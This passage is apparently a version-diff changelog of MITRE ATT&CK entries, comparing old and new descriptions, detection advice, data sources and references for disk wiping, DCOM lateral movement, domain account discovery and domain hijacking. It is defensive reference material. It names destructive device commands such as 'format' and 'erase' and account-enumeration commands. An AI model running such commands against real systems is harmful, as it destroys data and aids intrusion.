external_references[4]['description']Lakshmanan, R. (2022, May 2). AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection. Retrieved May 17, 2022.Hurley, S. (2021, December 7). Critical Hit: How DoppelPaymer Hunts and Kills Windows Processes. Retrieved January 26, 2022.
external_references[4]['url']https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.htmlhttps://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/
external_references[5]['source_name']dharma_ransomwareavoslocker_ransomware
external_references[5]['description']Loui, E. Scheuerman, K. et al. (2020, April 16). Targeted Dharma Ransomware Intrusions Exhibit Consistent Techniques. Retrieved January 26, 2022.Lakshmanan, R. (2022, May 2). AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection. Retrieved May 17, 2022.
external_references[5]['url']https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniques/https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html
external_references[6]['source_name']MDSec System Callsdharma_ransomware
external_references[6]['description']MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.Loui, E. Scheuerman, K. et al. (2020, April 16). Targeted Dharma Ransomware Intrusions Exhibit Consistent Techniques. Retrieved January 26, 2022.
external_references[6]['url']https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniques/
external_references[7]['source_name']SCADAfence_ransomwareMDSec System Calls
external_references[7]['description']Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022.MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.
external_references[7]['url']https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdfhttps://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
external_references[8]['source_name']demystifying_ryukSCADAfence_ransomware
external_references[8]['description']Tran, T. (2020, November 24). Demystifying Ransomware Attacks Against Microsoft Defender Solution. Retrieved January 26, 2022.Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022.
external_references[8]['url']https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf
external_references[9]['source_name']capecdemystifying_ryuk
external_references[9]['url']https://capec.mitre.org/data/definitions/578.htmlhttps://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[1]Driver: Driver LoadWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[2]Windows Registry: Windows Registry Key ModificationProcess: Process Termination
x_mitre_data_sources[3]Service: Service MetadataSensor Health: Host Status
x_mitre_data_sources[4]Command: Command ExecutionDriver: Driver Load
x_mitre_data_sources[5]Process: Process TerminationService: Service Metadata
x_mitre_data_sources[6]Sensor Health: Host StatusCommand: Command Execution
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsLucas Heiligenstein
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_contributorsLucas Heiligenstein

[T1561.002] Disk Wipe: Disk Structure Wipe

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may corrupt or wipe the disk data structures on t1Adversaries may corrupt or wipe the disk data structures on 
>a hard drive necessary to boot a system; targeting specific >a hard drive necessary to boot a system; targeting specific 
>critical systems or in large numbers in a network to interru>critical systems or in large numbers in a network to interru
>pt availability to system and network resources.   Adversari>pt availability to system and network resources.   Adversari
>es may attempt to render the system unable to boot by overwr>es may attempt to render the system unable to boot by overwr
>iting critical data located in structures such as the master>iting critical data located in structures such as the master
> boot record (MBR) or partition table.(Citation: Symantec Sh> boot record (MBR) or partition table.(Citation: Symantec Sh
>amoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Pa>amoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Pa
>lo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 201>lo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 201
>7)(Citation: Unit 42 Shamoon3 2018) The data contained in di>7)(Citation: Unit 42 Shamoon3 2018) The data contained in di
>sk structures may include the initial executable code for lo>sk structures may include the initial executable code for lo
>ading an operating system or the location of the file system>ading an operating system or the location of the file system
> partitions on disk. If this information is not present, the> partitions on disk. If this information is not present, the
> computer will not be able to load an operating system durin> computer will not be able to load an operating system durin
>g the boot process, leaving the computer unavailable. [Disk >g the boot process, leaving the computer unavailable. [Disk 
>Structure Wipe](https://attack.mitre.org/techniques/T1561/00>Structure Wipe](https://attack.mitre.org/techniques/T1561/00
>2) may be performed in isolation, or along with [Disk Conten>2) may be performed in isolation, or along with [Disk Conten
>t Wipe](https://attack.mitre.org/techniques/T1561/001) if al>t Wipe](https://attack.mitre.org/techniques/T1561/001) if al
>l sectors of a disk are wiped.  To maximize impact on the ta>l sectors of a disk are wiped.  On a network devices, advers
>rget organization, malware designed for destroying disk stru>aries may reformat the file system using [Network Device CLI
>ctures may have worm-like features to propagate across a net>](https://attack.mitre.org/techniques/T1059/008) commands su
>work by leveraging other techniques like [Valid Accounts](ht>ch as `format`.(Citation: format_cmd_cisco)  To maximize imp
>tps://attack.mitre.org/techniques/T1078), [OS Credential Dum>act on the target organization, malware designed for destroy
>ping](https://attack.mitre.org/techniques/T1003), and [SMB/W>ing disk structures may have worm-like features to propagate
>indows Admin Shares](https://attack.mitre.org/techniques/T10> across a network by leveraging other techniques like [Valid
>21/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye > Accounts](https://attack.mitre.org/techniques/T1078), [OS C
>Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Cita>redential Dumping](https://attack.mitre.org/techniques/T1003
>tion: Kaspersky StoneDrill 2017)>), and [SMB/Windows Admin Shares](https://attack.mitre.org/t
 >echniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citat
 >ion: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon N
 >ov 2016)(Citation: Kaspersky StoneDrill 2017)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_contributors['Austin Clark, @c2defense']
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator', 'root', 'SYSTEM']
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 23:00:00.367000+00:002023-04-14 19:38:24.089000+00:00
descriptionAdversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped. To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped. On a network devices, adversaries may reformat the file system using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `format`.(Citation: format_cmd_cisco) To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
external_references[1]['source_name']Symantec Shamoon 2012format_cmd_cisco
external_references[1]['description']Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.Cisco. (2022, August 16). format - Cisco IOS Configuration Fundamentals Command Reference. Retrieved July 13, 2022.
external_references[1]['url']https://www.symantec.com/connect/blogs/shamoon-attackshttps://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/F_through_K.html#wp2829794668
external_references[2]['source_name']FireEye Shamoon Nov 2016Unit 42 Shamoon3 2018
external_references[2]['description']FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.
external_references[2]['url']https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.htmlhttps://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/
external_references[4]['source_name']Kaspersky StoneDrill 2017FireEye Shamoon Nov 2016
external_references[4]['description']Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.
external_references[4]['url']https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdfhttps://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html
external_references[5]['source_name']Unit 42 Shamoon3 2018Kaspersky StoneDrill 2017
external_references[5]['description']Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.
external_references[5]['url']https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf
x_mitre_data_sources[2]Command: Command ExecutionDriver: Driver Load
x_mitre_data_sources[3]Driver: Driver LoadCommand: Command Execution
x_mitre_detectionLook for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the \\\\.\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the \\\\.\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity. For network infrastructure devices, collect AAA logging to monitor for `format` commands being run to erase the file structure and prevent recovery of the device.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Symantec Shamoon 2012', 'description': 'Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.', 'url': 'https://www.symantec.com/connect/blogs/shamoon-attacks'}
x_mitre_platformsNetwork

[T1561] Disk Wipe

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may wipe or corrupt raw disk data on specific syt1Adversaries may wipe or corrupt raw disk data on specific sy
>stems or in large numbers in a network to interrupt availabi>stems or in large numbers in a network to interrupt availabi
>lity to system and network resources. With direct write acce>lity to system and network resources. With direct write acce
>ss to a disk, adversaries may attempt to overwrite portions >ss to a disk, adversaries may attempt to overwrite portions 
>of disk data. Adversaries may opt to wipe arbitrary portions>of disk data. Adversaries may opt to wipe arbitrary portions
> of disk data and/or wipe disk structures like the master bo> of disk data and/or wipe disk structures like the master bo
>ot record (MBR). A complete wipe of all disk sectors may be >ot record (MBR). A complete wipe of all disk sectors may be 
>attempted.  To maximize impact on the target organization in>attempted.  To maximize impact on the target organization in
> operations where network-wide availability interruption is > operations where network-wide availability interruption is 
>the goal, malware used for wiping disks may have worm-like f>the goal, malware used for wiping disks may have worm-like f
>eatures to propagate across a network by leveraging addition>eatures to propagate across a network by leveraging addition
>al techniques like [Valid Accounts](https://attack.mitre.org>al techniques like [Valid Accounts](https://attack.mitre.org
>/techniques/T1078), [OS Credential Dumping](https://attack.m>/techniques/T1078), [OS Credential Dumping](https://attack.m
>itre.org/techniques/T1003), and [SMB/Windows Admin Shares](h>itre.org/techniques/T1003), and [SMB/Windows Admin Shares](h
>ttps://attack.mitre.org/techniques/T1021/002).(Citation: Nov>ttps://attack.mitre.org/techniques/T1021/002).(Citation: Nov
>etta Blockbuster Destructive Malware)>etta Blockbuster Destructive Malware)  On network devices, a
 >dversaries may wipe configuration files and other data from 
 >the device using [Network Device CLI](https://attack.mitre.o
 >rg/techniques/T1059/008) commands such as `erase`.(Citation:
 > erase_cmd_cisco)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Austin Clark, @c2defense']
values_changed
STIX FieldOld valueNew Value
modified2022-07-28 18:55:35.987000+00:002023-04-20 18:16:41.942000+00:00
descriptionAdversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted. To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted. To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware) On network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `erase`.(Citation: erase_cmd_cisco)
external_references[1]['source_name']Novetta Blockbuster Destructive Malwareerase_cmd_cisco
external_references[1]['description']Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.Cisco. (2022, August 16). erase - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.
external_references[1]['url']https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdfhttps://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/D_through_E.html#wp3557227463
external_references[2]['source_name']Microsoft Sysmon v6 May 2017Novetta Blockbuster Destructive Malware
external_references[2]['description']Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.
external_references[2]['url']https://docs.microsoft.com/sysinternals/downloads/sysmonhttps://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Drive: Drive AccessDrive: Drive Modification
x_mitre_data_sources[1]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[2]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[4]Drive: Drive ModificationDrive: Drive Access
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft Sysmon v6 May 2017', 'description': 'Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.', 'url': 'https://docs.microsoft.com/sysinternals/downloads/sysmon'}
x_mitre_platformsNetwork

[T1021.003] Remote Services: Distributed Component Object Model

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'SYSTEM']
values_changed
STIX FieldOld valueNew Value
modified2021-06-23 18:58:32.752000+00:002023-04-03 18:58:54.034000+00:00
external_references[3]['source_name']Microsoft Process Wide Com KeysMicrosoft COM ACL
external_references[3]['description']Microsoft. (n.d.). Setting Process-Wide Security Through the Registry. Retrieved November 21, 2017.Microsoft. (n.d.). DCOM Security Enhancements in Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1. Retrieved November 22, 2017.
external_references[3]['url']https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspxhttps://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1
external_references[4]['source_name']Microsoft COM ACLMicrosoft Process Wide Com Keys
external_references[4]['description']Microsoft. (n.d.). DCOM Security Enhancements in Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1. Retrieved November 22, 2017.Microsoft. (n.d.). Setting Process-Wide Security Through the Registry. Retrieved November 21, 2017.
external_references[4]['url']https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx
external_references[5]['source_name']Enigma Outlook DCOM Lateral Movement Nov 2017MSDN WMI
external_references[5]['description']Nelson, M. (2017, November 16). Lateral Movement using Outlook's CreateObject Method and DotNetToJScript. Retrieved November 21, 2017.Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.
external_references[5]['url']https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/https://msdn.microsoft.com/en-us/library/aa394582.aspx
external_references[6]['source_name']Enigma MMC20 COM Jan 2017Enigma DCOM Lateral Movement Jan 2017
external_references[6]['description']Nelson, M. (2017, January 5). Lateral Movement using the MMC20 Application COM Object. Retrieved November 21, 2017.Nelson, M. (2017, January 23). Lateral Movement via DCOM: Round 2. Retrieved November 21, 2017.
external_references[6]['url']https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
external_references[7]['source_name']Enigma DCOM Lateral Movement Jan 2017Enigma MMC20 COM Jan 2017
external_references[7]['description']Nelson, M. (2017, January 23). Lateral Movement via DCOM: Round 2. Retrieved November 21, 2017.Nelson, M. (2017, January 5). Lateral Movement using the MMC20 Application COM Object. Retrieved November 21, 2017.
external_references[7]['url']https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
external_references[8]['source_name']Enigma Excel DCOM Sept 2017Enigma Outlook DCOM Lateral Movement Nov 2017
external_references[8]['description']Nelson, M. (2017, September 11). Lateral Movement using Excel.Application and DCOM. Retrieved November 21, 2017.Nelson, M. (2017, November 16). Lateral Movement using Outlook's CreateObject Method and DotNetToJScript. Retrieved November 21, 2017.
external_references[8]['url']https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/
external_references[9]['source_name']Cyberreason DCOM DDE Lateral Movement Nov 2017Enigma Excel DCOM Sept 2017
external_references[9]['description']Tsukerman, P. (2017, November 8). Leveraging Excel DDE for lateral movement via DCOM. Retrieved November 21, 2017.Nelson, M. (2017, September 11). Lateral Movement using Excel.Application and DCOM. Retrieved November 21, 2017.
external_references[9]['url']https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcomhttps://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
external_references[10]['source_name']MSDN WMICyberreason DCOM DDE Lateral Movement Nov 2017
external_references[10]['description']Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.Tsukerman, P. (2017, November 8). Leveraging Excel DDE for lateral movement via DCOM. Retrieved November 21, 2017.
external_references[10]['url']https://msdn.microsoft.com/en-us/library/aa394582.aspxhttps://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom
x_mitre_data_sources[0]Process: Process CreationModule: Module Load
x_mitre_data_sources[2]Module: Module LoadProcess: Process Creation
x_mitre_version1.11.2

[T1087.002] Account Discovery: Domain Account

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may attempt to get a listing of domain accounts.t1Adversaries may attempt to get a listing of domain accounts.
> This information can help adversaries determine which domai> This information can help adversaries determine which domai
>n accounts exist to aid in follow-on behavior.  Commands suc>n accounts exist to aid in follow-on behavior such as target
>h as <code>net user /domain</code> and <code>net group /doma>ing specific accounts which possess particular privileges.  
>in</code> of the [Net](https://attack.mitre.org/software/S00>Commands such as <code>net user /domain</code> and <code>net
>39) utility, <code>dscacheutil -q group</code>on macOS, and > group /domain</code> of the [Net](https://attack.mitre.org/
><code>ldapsearch</code> on Linux can list domain users and g>software/S0039) utility, <code>dscacheutil -q group</code>on
>roups.> macOS, and <code>ldapsearch</code> on Linux can list domain
 > users and groups. [PowerShell](https://attack.mitre.org/tec
 >hniques/T1059/001) cmdlets including <code>Get-ADUser</code>
 > and <code>Get-ADGroupMember</code> may enumerate members of
 > Active Directory groups.  
Details
values_changed
STIX FieldOld valueNew Value
modified2022-08-25 13:04:00.863000+00:002023-04-15 16:37:59.115000+00:00
descriptionAdversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior. Commands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups.Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges. Commands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including Get-ADUser and Get-ADGroupMember may enumerate members of Active Directory groups.
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Command: Command ExecutionNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Process: Process CreationProcess: OS API Execution
x_mitre_data_sources[2]Network Traffic: Network Traffic ContentProcess: Process Creation
x_mitre_data_sources[4]Process: OS API ExecutionCommand: Command Execution
x_mitre_version1.11.2
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/575.html', 'external_id': 'CAPEC-575'}

[T1078.002] Valid Accounts: Domain Accounts

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 20:14:34.479000+00:002023-04-13 17:17:03.605000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesUser Account: User Account Authentication
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/560.html', 'external_id': 'CAPEC-560'}
x_mitre_data_sourcesUser Account: User Account Authentication

[T1069.002] Permission Groups Discovery: Domain Groups

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21 12:55:51.337000+00:002023-04-07 17:16:47.754000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesGroup: Group Enumeration
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesGroup: Group Enumeration

[T1584.001] Compromise Infrastructure: Domains

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may hijack domains and/or subdomains that can bet1Adversaries may hijack domains and/or subdomains that can be
> used during targeting. Domain registration hijacking is the> used during targeting. Domain registration hijacking is the
> act of changing the registration of a domain name without t> act of changing the registration of a domain name without t
>he permission of the original registrant.(Citation: ICANNDom>he permission of the original registrant.(Citation: ICANNDom
>ainNameHijacking) Adversaries may gain access to an email ac>ainNameHijacking) Adversaries may gain access to an email ac
>count for the person listed as the owner of the domain. The >count for the person listed as the owner of the domain. The 
>adversary can then claim that they forgot their password in >adversary can then claim that they forgot their password in 
>order to make changes to the domain registration. Other poss>order to make changes to the domain registration. Other poss
>ibilities include social engineering a domain registration h>ibilities include social engineering a domain registration h
>elp desk to gain access to an account or taking advantage of>elp desk to gain access to an account or taking advantage of
> renewal process gaps.(Citation: Krebs DNS Hijack 2019)  Sub> renewal process gaps.(Citation: Krebs DNS Hijack 2019)  Sub
>domain hijacking can occur when organizations have DNS entri>domain hijacking can occur when organizations have DNS entri
>es that point to non-existent or deprovisioned resources. In>es that point to non-existent or deprovisioned resources. In
> such cases, an adversary may take control of a subdomain to> such cases, an adversary may take control of a subdomain to
> conduct operations with the benefit of the trust associated> conduct operations with the benefit of the trust associated
> with that domain.(Citation: Microsoft Sub Takeover 2020)> with that domain.(Citation: Microsoft Sub Takeover 2020)  A
 >dversaries who compromise a domain may also engage in domain
 > shadowing by creating malicious subdomains under their cont
 >rol while keeping any existing DNS records. As service will 
 >not be disrupted, the malicious subdomains may go unnoticed 
 >for long periods of time.(Citation: Palo Alto Unit 42 Domain
 > Shadowing 2022)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-20 14:10:48.814000+00:002023-03-07 13:05:42.901000+00:00
descriptionAdversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019) Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019) Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020) Adversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.(Citation: Palo Alto Unit 42 Domain Shadowing 2022)
external_references[3]['source_name']Microsoft Sub Takeover 2020Palo Alto Unit 42 Domain Shadowing 2022
external_references[3]['description']Microsoft. (2020, September 29). Prevent dangling DNS entries and avoid subdomain takeover. Retrieved October 12, 2020.Janos Szurdi, Rebekah Houser and Daiping Liu. (2022, September 21). Domain Shadowing: A Stealthy Use of DNS Compromise for Cybercrime. Retrieved March 7, 2023.
external_references[3]['url']https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeoverhttps://unit42.paloaltonetworks.com/domain-shadowing/
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[1]Domain Name: Passive DNSDomain Name: Domain Registration
x_mitre_data_sources[2]Domain Name: Domain RegistrationDomain Name: Passive DNS
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
